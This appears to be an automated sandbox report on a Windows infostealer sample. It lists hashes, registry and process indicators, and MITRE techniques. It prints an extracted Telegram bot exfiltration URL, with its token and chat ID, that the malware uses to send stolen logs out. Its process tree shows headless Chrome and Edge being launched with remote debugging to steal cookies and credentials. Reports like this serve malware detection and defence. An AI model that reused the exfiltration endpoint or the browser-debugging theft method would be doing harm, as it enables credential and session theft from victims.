Analysis
-
max time kernel
125s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20250313-en -
resource tags
arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system -
submitted
03/04/2025, 10:33
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe
Resource
win10v2004-20250313-en
General
-
Target
2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe
-
Size
5.7MB
-
MD5
2c2efc29fc75c25b90e1472e30e7be0a
-
SHA1
bf4d7300c88893be11e8b8c1cd84be7a421544ef
-
SHA256
def69023e3e78c66804a4a7996607540cb2c6f57eeda633a04720ce39291b103
-
SHA512
4bfc52b2abfbc478b37c29e4f642d63aa7031e502a637175e4c0e79b86a453f3e593e60a654f2f5fd2bebeb31c135c7c90d198ff738624d33d34dd3bbcdad5e7
-
SSDEEP
98304:DWl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6Uczq:DtOuK6mn9NzgMoYkSIvUcwti7TQlvcij
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7762282231:AAHXw4eRj3GOllE1bbAM7ABgQpzu_mwXV8c/sendDocument?chat_id=-4788462796&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20212.102.63.147%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan
Signatures
-
Gurcu family
-
Uses browser remote debugging 2 TTPs 10 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 5244 chrome.exe 1532 chrome.exe 3712 chrome.exe 3612 chrome.exe 3888 msedge.exe 4164 msedge.exe 4700 msedge.exe 1740 msedge.exe 4544 chrome.exe 4744 chrome.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe -
Loads dropped DLL 1 IoCs
pid Process 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 3 raw.githubusercontent.com 4 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133881500015847921" chrome.exe -
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid Process 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 4544 chrome.exe 4544 chrome.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 4544 chrome.exe 4544 chrome.exe 4544 chrome.exe 4544 chrome.exe 4544 chrome.exe 3888 msedge.exe 3888 msedge.exe 3888 msedge.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe Token: SeShutdownPrivilege 4544 chrome.exe Token: SeCreatePagefilePrivilege 4544 chrome.exe Token: SeShutdownPrivilege 4544 chrome.exe Token: SeCreatePagefilePrivilege 4544 chrome.exe Token: SeShutdownPrivilege 4544 chrome.exe Token: SeCreatePagefilePrivilege 4544 chrome.exe Token: SeShutdownPrivilege 4544 chrome.exe Token: SeCreatePagefilePrivilege 4544 chrome.exe Token: SeShutdownPrivilege 4544 chrome.exe Token: SeCreatePagefilePrivilege 4544 chrome.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4544 chrome.exe 3888 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3448 wrote to memory of 4544 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 90 PID 3448 wrote to memory of 4544 3448 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 90 PID 4544 wrote to memory of 4560 4544 chrome.exe 91 PID 4544 wrote to memory of 4560 4544 chrome.exe 91 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 4216 4544 chrome.exe 92 PID 4544 wrote to memory of 5480 4544 chrome.exe 93 PID 4544 wrote to memory of 5480 4544 chrome.exe 93 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94 PID 4544 wrote to memory of 4800 4544 chrome.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3448 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --headless --disable-gpu2⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff84c18dcf8,0x7ff84c18dd04,0x7ff84c18dd103⤵PID:4560
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2008,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1996 /prefetch:23⤵PID:4216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2176,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2172 /prefetch:33⤵PID:5480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2308,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2312 /prefetch:83⤵PID:4800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3140 /prefetch:13⤵
- Uses browser remote debugging
PID:4744
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3168 /prefetch:13⤵
- Uses browser remote debugging
PID:5244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4236,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4232 /prefetch:23⤵
- Uses browser remote debugging
PID:1532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4624,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4620 /prefetch:13⤵
- Uses browser remote debugging
PID:3712
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5256,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5228 /prefetch:83⤵PID:3100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5456,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5432 /prefetch:83⤵PID:2536
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5496,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5500 /prefetch:83⤵PID:3124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5228,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5524 /prefetch:83⤵PID:636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5336,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5312 /prefetch:83⤵PID:5852
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5524,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5652 /prefetch:83⤵PID:4976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5240,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5380 /prefetch:13⤵
- Uses browser remote debugging
PID:3612
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --headless --disable-gpu2⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:3888 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2a4,0x7ff84ceef208,0x7ff84ceef214,0x7ff84ceef2203⤵PID:5424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --always-read-main-dll --field-trial-handle=2276,i,5116602807649470947,1885021473823269398,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2268 /prefetch:23⤵PID:3100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2312,i,5116602807649470947,1885021473823269398,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2304 /prefetch:33⤵PID:3920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2588,i,5116602807649470947,1885021473823269398,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2580 /prefetch:83⤵PID:5276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3532,i,5116602807649470947,1885021473823269398,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3528 /prefetch:13⤵
- Uses browser remote debugging
PID:4700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3564,i,5116602807649470947,1885021473823269398,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3548 /prefetch:13⤵
- Uses browser remote debugging
PID:4164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4988,i,5116602807649470947,1885021473823269398,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4984 /prefetch:13⤵
- Uses browser remote debugging
PID:1740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpB3DF.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpB3DF.tmp.bat2⤵PID:3992
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:2476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:2152
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:4604
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
79KB
MD539b945cfb3c33402178a3f5324b73874
SHA12080f79539259808fd8da3b6836e07257a74191e
SHA256e128ba3b7bf3179d7f2e7040e5c9611dea7874a02105aaad1842f59264e28ae9
SHA512cd182ab179a3a490a6142bd411e36cb081e7f798fc44510a3611f4712e18846a4ab070b3ef616c7f471652fb9bf74c23f349852ba57706bd61f3d3282384d396
-
Filesize
649B
MD5ac95d4912f1136d4c63ed3ff0ab68ff7
SHA1deb8b9b69d5e223c477428742092fdf905b98feb
SHA2564476ee3216c6eaa39a8b5816897af246eeb212333d4cf61ac9f840c93c677178
SHA512ac1ad25948ee6cdb6d1c02dec25488cd344883241701eb9625be47bf2b6fb1cc3afc07b0e0631a7a5c01b257587cc4fe9a1a540f23ec548447698f4be2031123
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
